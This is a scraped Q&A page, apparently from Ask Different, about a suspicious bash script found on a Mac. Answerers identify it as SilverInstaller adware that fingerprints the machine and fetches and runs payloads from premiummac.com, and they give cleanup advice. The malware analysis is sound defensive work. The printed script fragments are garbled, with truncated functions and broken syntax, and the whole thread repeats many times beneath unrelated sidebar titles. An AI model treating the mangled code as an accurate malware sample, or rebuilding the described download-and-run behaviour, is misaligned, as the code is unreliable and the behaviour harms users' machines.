Bsrgvty

How to remove solidified paste from toothbrush

Car imitates dead battery but comes back to life ~30 minutes later and lets me start it

Would a warhorse allow its rider to approach a Dragon at all?

On Valentine's Day

UK visitors visa needed fast for badly injured family member

Should I present forged documents in a Penetration Test/Red team engagement?

Why can't we have only one complex eigenvalue?

Hot Rim Looking for Suggestions

What does "lequel" mean in this sentence, and how does the rest of its grammar operate?

Is it a mistake to use a password that has previously been used (by anyone ever)?

Is Segwit really safe and reduced?

Optimizing PostGIS query on table using buffered point

How would a medieval village protect themselves against dinosaurs?

Special case of filling between curves

GLPK: meaning of the "marginal' column in the solution output

Impulse response of a transfer function

"Store" a remote SSH session?

Patent Agreement in Order to Graduate

Seen from Europe, why is there a hard separation between Republicans and Democrats in the US?

There exists a prime p such that p | n for all n ∈ N, n > 1

Why would one use "enter the name of the project to confirm"?

How big could a meteor crater be without causing significant secondary effects?

Balancing empathy and deferring to the syllabus in teaching responsibilities

How can a bigfoot hide from satellites?

What is this unknown executable on my boot volume? Is it Malicious?

Is this possible to improve boot time?OS X renames secondary volume on bootWhat is wrong in this Perl regex in OSX?Disable Spotlight for Non-Current Boot VolumeLaunchd script to mount volume on bootopened malicious attachment from scam email- what to do?Is “Ignore ownership on this volume” reversible?What is this executable file named “Icon?” doing in my applications folder (and other folders)?What is this strange process `qemu` connecting to minergate.com?Dual Boot Created a New Volume

.everyoneloves__top-leaderboard:empty,.everyoneloves__mid-leaderboard:empty,.everyoneloves__bot-mid-leaderboard:empty
margin-bottom:0;

20

8

I noticed I had this file in the Macintosh HD folder.

And then when I click on it, it shows this:

Apparently this file was created in 2017, but I don't remember creating it.

Any idea what it could be?

Its content:

#!/bin/bash
func_4() [ "$COUNTRY" == "CA" ] 
func_4 &

macos bash file malware

share|improve this question

edited Sep 11 at 18:10

ankii

3,84655 gold badges77 silver badges3535 bronze badges

asked Sep 10 at 20:52

Friendly SirenFriendly Siren

31111 silver badge44 bronze badges

• 
  
  
  

  
  31
  

  
  
  
  
  
  

  
  
  Double clicking (aka running the file) is not advisable since you have no idea what it does. This appears to be a shell script of some type so you should edit it and post the contents to your original question so we can see what it contains.
  
  – Allan
  Sep 10 at 21:03
  

  
  
  
  


• 
  
  
  

  
  3
  

  
  
  
  
  
  

  
  
  open it in a text editor, that is what I do. Often these are spurious files created by an app or the OS that can be deleted with no consequence. But if you are curious, peek inside and see what it says...
  
  – Steve Chambers
  Sep 10 at 21:03
  

  
  
  
  


• 
  
  
  

  
  2
  

  
  
  
  
  
  

  
  
  If you want to do this via the terminal, just issue the command cat file | pbcopy and then paste it to the question. Do this from the Macintosh HD folder.
  
  – Allan
  Sep 10 at 21:04
  

  
  
  
  


• 
  
  
  

  
  2
  

  
  
  
  
  
  

  
  
  So, what I was able to uncover is that the script downloads and extracts a file from premiummac.com which is hosted on an AWS server. Issue the command dig premiummac.com in Terminal for the details. searchitdown seems to redirect to a google page. What you’re looking at here is some very questionable script that looks, walks, and quacks like a malware infected duck.
  
  – Allan
  Sep 10 at 21:39
  

  
  
  
  


• 
  
  
  

  
  8
  

  
  
  
  
  
  

  
  
  That script downloads malware from a remote server. You need to assume it ran at some point and your system is already compromised. Don't take any chances and reinstall the machine, then change your passwords and consider all data that was in contact with the machine up to the reinstall compromised.
  
  – André Borie
  Sep 11 at 10:54
  

  
  
  
  

 | 
show 3 more comments

20

8

I noticed I had this file in the Macintosh HD folder.

And then when I click on it, it shows this:

Apparently this file was created in 2017, but I don't remember creating it.

Any idea what it could be?

Its content:

#!/bin/bash
func_4() [ "$COUNTRY" == "CA" ] 
func_4 &

macos bash file malware

share|improve this question

edited Sep 11 at 18:10

ankii

3,84655 gold badges77 silver badges3535 bronze badges

asked Sep 10 at 20:52

Friendly SirenFriendly Siren

31111 silver badge44 bronze badges

• 
  
  
  

  
  31
  

  
  
  
  
  
  

  
  
  Double clicking (aka running the file) is not advisable since you have no idea what it does. This appears to be a shell script of some type so you should edit it and post the contents to your original question so we can see what it contains.
  
  – Allan
  Sep 10 at 21:03
  

  
  
  
  


• 
  
  
  

  
  3
  

  
  
  
  
  
  

  
  
  open it in a text editor, that is what I do. Often these are spurious files created by an app or the OS that can be deleted with no consequence. But if you are curious, peek inside and see what it says...
  
  – Steve Chambers
  Sep 10 at 21:03
  

  
  
  
  


• 
  
  
  

  
  2
  

  
  
  
  
  
  

  
  
  If you want to do this via the terminal, just issue the command cat file | pbcopy and then paste it to the question. Do this from the Macintosh HD folder.
  
  – Allan
  Sep 10 at 21:04
  

  
  
  
  


• 
  
  
  

  
  2
  

  
  
  
  
  
  

  
  
  So, what I was able to uncover is that the script downloads and extracts a file from premiummac.com which is hosted on an AWS server. Issue the command dig premiummac.com in Terminal for the details. searchitdown seems to redirect to a google page. What you’re looking at here is some very questionable script that looks, walks, and quacks like a malware infected duck.
  
  – Allan
  Sep 10 at 21:39
  

  
  
  
  


• 
  
  
  

  
  8
  

  
  
  
  
  
  

  
  
  That script downloads malware from a remote server. You need to assume it ran at some point and your system is already compromised. Don't take any chances and reinstall the machine, then change your passwords and consider all data that was in contact with the machine up to the reinstall compromised.
  
  – André Borie
  Sep 11 at 10:54
  

  
  
  
  

 | 
show 3 more comments

I noticed I had this file in the Macintosh HD folder.

And then when I click on it, it shows this:

Apparently this file was created in 2017, but I don't remember creating it.

Any idea what it could be?

Its content:

#!/bin/bash
func_4() [ "$COUNTRY" == "CA" ] 
func_4 &

macos bash file malware

share|improve this question

edited Sep 11 at 18:10

ankii

3,84655 gold badges77 silver badges3535 bronze badges

asked Sep 10 at 20:52

Friendly SirenFriendly Siren

31111 silver badge44 bronze badges

#!/bin/bash
func_4() [ "$COUNTRY" == "CA" ] 
func_4 &

share|improve this question

edited Sep 11 at 18:10

ankii

3,84655 gold badges77 silver badges3535 bronze badges

asked Sep 10 at 20:52

Friendly SirenFriendly Siren

31111 silver badge44 bronze badges

share|improve this question

edited Sep 11 at 18:10

ankii

3,84655 gold badges77 silver badges3535 bronze badges

asked Sep 10 at 20:52

Friendly SirenFriendly Siren

31111 silver badge44 bronze badges

edited Sep 11 at 18:10

ankii

3,84655 gold badges77 silver badges3535 bronze badges

edited Sep 11 at 18:10

ankii

3,84655 gold badges77 silver badges3535 bronze badges

asked Sep 10 at 20:52

Friendly SirenFriendly Siren

31111 silver badge44 bronze badges

asked Sep 10 at 20:52

Friendly SirenFriendly Siren

31111 silver badge44 bronze badges

2 Answers
2

active

oldest

votes

42

This is SilverInstaller, adware to download more adware and ‘potentially unwanted programs’. This was likely distributed through fake Flash popups, which someone on the system clicked on, downloaded, opened, installed and provided administrator credentials to.

Installed software in this package likely includes

MacKeeper, VSearch, A Pirrit injector, BrowserEnhancer, MPlayer

all of which you most certainly don't want.

• https://www.intego.com/mac-security-blog/silverinstaller-uses-new-techniques-to-install-puapup/


• https://www.intego.com/mac-security-blog/silverinstaller-sneakier-than-previously-thought/

I'll break down the code

#!/bin/bash

This code is script to be interpreted by bash, noted by this shebang.

func_4() awk '/IOPlatformUUID/ split($0, line, """); printf("%sn", line[4]); ')

Get a unique identifier for this machine to be used later.

COUNTRY="CA"
if [ "$COUNTRY" == "AU" ] 
func_4 &

Function all ready to go, time to call it.

share|improve this answer

edited Sep 10 at 22:19

answered Sep 10 at 21:48

grg♦grg

148k2525 gold badges238238 silver badges351351 bronze badges

• 
  
  
  

  
  4
  

  
  
  
  
  
  

  
  
  This answers these two questions too :)stackoverflow.com/search?q=www.searchitdown.com
  
  – ankii
  Sep 10 at 22:00
  

  
  
  
  


• 
  
  
  

  
  3
  

  
  
  
  
  
  

  
  
  @grg thank you so much for taking the time to both identify this and break down the code for me to understand it. Any idea what I should do to get rid of it? I already ran malware bytes on my mac
  
  – Friendly Siren
  Sep 10 at 22:49
  

  
  
  
  


• 
  
  
  

  
  1
  

  
  
  
  
  
  

  
  
  @FriendlySiren you should be able to run sudo rm /File to get rid of the script itself. This won't remove any malware installed by it though.
  
  – nohillside♦
  Sep 11 at 13:11
  

  
  
  
  


• 
  
  
  

  
  4
  

  
  
  
  
  
  

  
  
  It's pretty likely the hardcoded values (COUNTRY and CLIENT_COMP) are filled in by the server as it's sending the script. It's easier and more reliable than having the server change that code dynamically.
  
  – Kevin
  Sep 11 at 17:06
  

  
  
  
  


• 
  
  
  

  
  2
  

  
  
  
  
  
  

  
  
  The good news is that two out of three payloads return server errors, and the third is non-functional without the others.
  
  – Mark
  Sep 11 at 19:54
  

  
  
  
  

 | 
show 4 more comments

5

That script does everything I would expect malware to do and has been around for a while so the domains it connects could be blocked or shut down now.

• Downloads some files, runs those files and cleans up after itself.

It could be ad(vertising)ware instead of malware, but it’s clearly fingerprinting your mac, reporting a unique identifier for your Mac and intending to change the state of the Mac. Unless you opted in to the tool and wanted it to run, (and even if you did once) downloading and running the MalwareBytes cleaner would be my next step

• https://www.malwarebytes.com/

share|improve this answer

answered Sep 10 at 21:35

bmike♦bmike

175k4747 gold badges314314 silver badges674674 bronze badges

• 
  
  
  

  
  3
  

  
  
  
  
  
  

  
  
  The output including and following 'logout' is part of Terminal's session management (/etc/bashrc_Apple_Terminal) and unrelated to the file.
  
  – grg♦
  Sep 10 at 21:03
  
  

  
  
  
  


• 
  
  
  

  
  

  
  
  
  
  
  

  
  
  @bmike I've ran malware bytes on my mac many times, it never got rid of this file for some reason. But I'll run it again just to make sure. Thanks :)
  
  – Friendly Siren
  Sep 10 at 22:51
  

  
  
  
  

add a comment
 | 

42

This is SilverInstaller, adware to download more adware and ‘potentially unwanted programs’. This was likely distributed through fake Flash popups, which someone on the system clicked on, downloaded, opened, installed and provided administrator credentials to.

Installed software in this package likely includes

MacKeeper, VSearch, A Pirrit injector, BrowserEnhancer, MPlayer

all of which you most certainly don't want.

• https://www.intego.com/mac-security-blog/silverinstaller-uses-new-techniques-to-install-puapup/


• https://www.intego.com/mac-security-blog/silverinstaller-sneakier-than-previously-thought/

I'll break down the code

#!/bin/bash

This code is script to be interpreted by bash, noted by this shebang.

func_4() awk '/IOPlatformUUID/ split($0, line, """); printf("%sn", line[4]); ')

Get a unique identifier for this machine to be used later.

COUNTRY="CA"
if [ "$COUNTRY" == "AU" ] 
func_4 &

Function all ready to go, time to call it.

share|improve this answer

edited Sep 10 at 22:19

answered Sep 10 at 21:48

grg♦grg

148k2525 gold badges238238 silver badges351351 bronze badges

• 
  
  
  

  
  4
  

  
  
  
  
  
  

  
  
  This answers these two questions too :)stackoverflow.com/search?q=www.searchitdown.com
  
  – ankii
  Sep 10 at 22:00
  

  
  
  
  


• 
  
  
  

  
  3
  

  
  
  
  
  
  

  
  
  @grg thank you so much for taking the time to both identify this and break down the code for me to understand it. Any idea what I should do to get rid of it? I already ran malware bytes on my mac
  
  – Friendly Siren
  Sep 10 at 22:49
  

  
  
  
  


• 
  
  
  

  
  1
  

  
  
  
  
  
  

  
  
  @FriendlySiren you should be able to run sudo rm /File to get rid of the script itself. This won't remove any malware installed by it though.
  
  – nohillside♦
  Sep 11 at 13:11
  

  
  
  
  


• 
  
  
  

  
  4
  

  
  
  
  
  
  

  
  
  It's pretty likely the hardcoded values (COUNTRY and CLIENT_COMP) are filled in by the server as it's sending the script. It's easier and more reliable than having the server change that code dynamically.
  
  – Kevin
  Sep 11 at 17:06
  

  
  
  
  


• 
  
  
  

  
  2
  

  
  
  
  
  
  

  
  
  The good news is that two out of three payloads return server errors, and the third is non-functional without the others.
  
  – Mark
  Sep 11 at 19:54
  

  
  
  
  

 | 
show 4 more comments

42

This is SilverInstaller, adware to download more adware and ‘potentially unwanted programs’. This was likely distributed through fake Flash popups, which someone on the system clicked on, downloaded, opened, installed and provided administrator credentials to.

Installed software in this package likely includes

MacKeeper, VSearch, A Pirrit injector, BrowserEnhancer, MPlayer

all of which you most certainly don't want.

• https://www.intego.com/mac-security-blog/silverinstaller-uses-new-techniques-to-install-puapup/


• https://www.intego.com/mac-security-blog/silverinstaller-sneakier-than-previously-thought/

I'll break down the code

#!/bin/bash

This code is script to be interpreted by bash, noted by this shebang.

func_4() awk '/IOPlatformUUID/ split($0, line, """); printf("%sn", line[4]); ')

Get a unique identifier for this machine to be used later.

COUNTRY="CA"
if [ "$COUNTRY" == "AU" ] 
func_4 &

Function all ready to go, time to call it.

share|improve this answer

edited Sep 10 at 22:19

answered Sep 10 at 21:48

grg♦grg

148k2525 gold badges238238 silver badges351351 bronze badges

• 
  
  
  

  
  4
  

  
  
  
  
  
  

  
  
  This answers these two questions too :)stackoverflow.com/search?q=www.searchitdown.com
  
  – ankii
  Sep 10 at 22:00
  

  
  
  
  


• 
  
  
  

  
  3
  

  
  
  
  
  
  

  
  
  @grg thank you so much for taking the time to both identify this and break down the code for me to understand it. Any idea what I should do to get rid of it? I already ran malware bytes on my mac
  
  – Friendly Siren
  Sep 10 at 22:49
  

  
  
  
  


• 
  
  
  

  
  1
  

  
  
  
  
  
  

  
  
  @FriendlySiren you should be able to run sudo rm /File to get rid of the script itself. This won't remove any malware installed by it though.
  
  – nohillside♦
  Sep 11 at 13:11
  

  
  
  
  


• 
  
  
  

  
  4
  

  
  
  
  
  
  

  
  
  It's pretty likely the hardcoded values (COUNTRY and CLIENT_COMP) are filled in by the server as it's sending the script. It's easier and more reliable than having the server change that code dynamically.
  
  – Kevin
  Sep 11 at 17:06
  

  
  
  
  


• 
  
  
  

  
  2
  

  
  
  
  
  
  

  
  
  The good news is that two out of three payloads return server errors, and the third is non-functional without the others.
  
  – Mark
  Sep 11 at 19:54
  

  
  
  
  

 | 
show 4 more comments

This is SilverInstaller, adware to download more adware and ‘potentially unwanted programs’. This was likely distributed through fake Flash popups, which someone on the system clicked on, downloaded, opened, installed and provided administrator credentials to.

Installed software in this package likely includes

MacKeeper, VSearch, A Pirrit injector, BrowserEnhancer, MPlayer

all of which you most certainly don't want.

• https://www.intego.com/mac-security-blog/silverinstaller-uses-new-techniques-to-install-puapup/


• https://www.intego.com/mac-security-blog/silverinstaller-sneakier-than-previously-thought/

I'll break down the code

#!/bin/bash

This code is script to be interpreted by bash, noted by this shebang.

func_4() awk '/IOPlatformUUID/ split($0, line, """); printf("%sn", line[4]); ')

Get a unique identifier for this machine to be used later.

COUNTRY="CA"
if [ "$COUNTRY" == "AU" ] 
func_4 &

Function all ready to go, time to call it.

share|improve this answer

edited Sep 10 at 22:19

answered Sep 10 at 21:48

grg♦grg

148k2525 gold badges238238 silver badges351351 bronze badges

share|improve this answer

edited Sep 10 at 22:19

answered Sep 10 at 21:48

grg♦grg

148k2525 gold badges238238 silver badges351351 bronze badges

answered Sep 10 at 21:48

grg♦grg

148k2525 gold badges238238 silver badges351351 bronze badges

answered Sep 10 at 21:48

grg♦grg

148k2525 gold badges238238 silver badges351351 bronze badges

5

That script does everything I would expect malware to do and has been around for a while so the domains it connects could be blocked or shut down now.

• Downloads some files, runs those files and cleans up after itself.

It could be ad(vertising)ware instead of malware, but it’s clearly fingerprinting your mac, reporting a unique identifier for your Mac and intending to change the state of the Mac. Unless you opted in to the tool and wanted it to run, (and even if you did once) downloading and running the MalwareBytes cleaner would be my next step

• https://www.malwarebytes.com/

share|improve this answer

answered Sep 10 at 21:35

bmike♦bmike

175k4747 gold badges314314 silver badges674674 bronze badges

• 
  
  
  

  
  3
  

  
  
  
  
  
  

  
  
  The output including and following 'logout' is part of Terminal's session management (/etc/bashrc_Apple_Terminal) and unrelated to the file.
  
  – grg♦
  Sep 10 at 21:03
  
  

  
  
  
  


• 
  
  
  

  
  

  
  
  
  
  
  

  
  
  @bmike I've ran malware bytes on my mac many times, it never got rid of this file for some reason. But I'll run it again just to make sure. Thanks :)
  
  – Friendly Siren
  Sep 10 at 22:51
  

  
  
  
  

add a comment
 | 

5

That script does everything I would expect malware to do and has been around for a while so the domains it connects could be blocked or shut down now.

• Downloads some files, runs those files and cleans up after itself.

It could be ad(vertising)ware instead of malware, but it’s clearly fingerprinting your mac, reporting a unique identifier for your Mac and intending to change the state of the Mac. Unless you opted in to the tool and wanted it to run, (and even if you did once) downloading and running the MalwareBytes cleaner would be my next step

• https://www.malwarebytes.com/

share|improve this answer

answered Sep 10 at 21:35

bmike♦bmike

175k4747 gold badges314314 silver badges674674 bronze badges

• 
  
  
  

  
  3
  

  
  
  
  
  
  

  
  
  The output including and following 'logout' is part of Terminal's session management (/etc/bashrc_Apple_Terminal) and unrelated to the file.
  
  – grg♦
  Sep 10 at 21:03
  
  

  
  
  
  


• 
  
  
  

  
  

  
  
  
  
  
  

  
  
  @bmike I've ran malware bytes on my mac many times, it never got rid of this file for some reason. But I'll run it again just to make sure. Thanks :)
  
  – Friendly Siren
  Sep 10 at 22:51
  

  
  
  
  

add a comment
 | 

That script does everything I would expect malware to do and has been around for a while so the domains it connects could be blocked or shut down now.

• Downloads some files, runs those files and cleans up after itself.

It could be ad(vertising)ware instead of malware, but it’s clearly fingerprinting your mac, reporting a unique identifier for your Mac and intending to change the state of the Mac. Unless you opted in to the tool and wanted it to run, (and even if you did once) downloading and running the MalwareBytes cleaner would be my next step

• https://www.malwarebytes.com/

share|improve this answer

answered Sep 10 at 21:35

bmike♦bmike

175k4747 gold badges314314 silver badges674674 bronze badges

share|improve this answer

answered Sep 10 at 21:35

bmike♦bmike

175k4747 gold badges314314 silver badges674674 bronze badges

answered Sep 10 at 21:35

bmike♦bmike

175k4747 gold badges314314 silver badges674674 bronze badges

answered Sep 10 at 21:35

bmike♦bmike

175k4747 gold badges314314 silver badges674674 bronze badges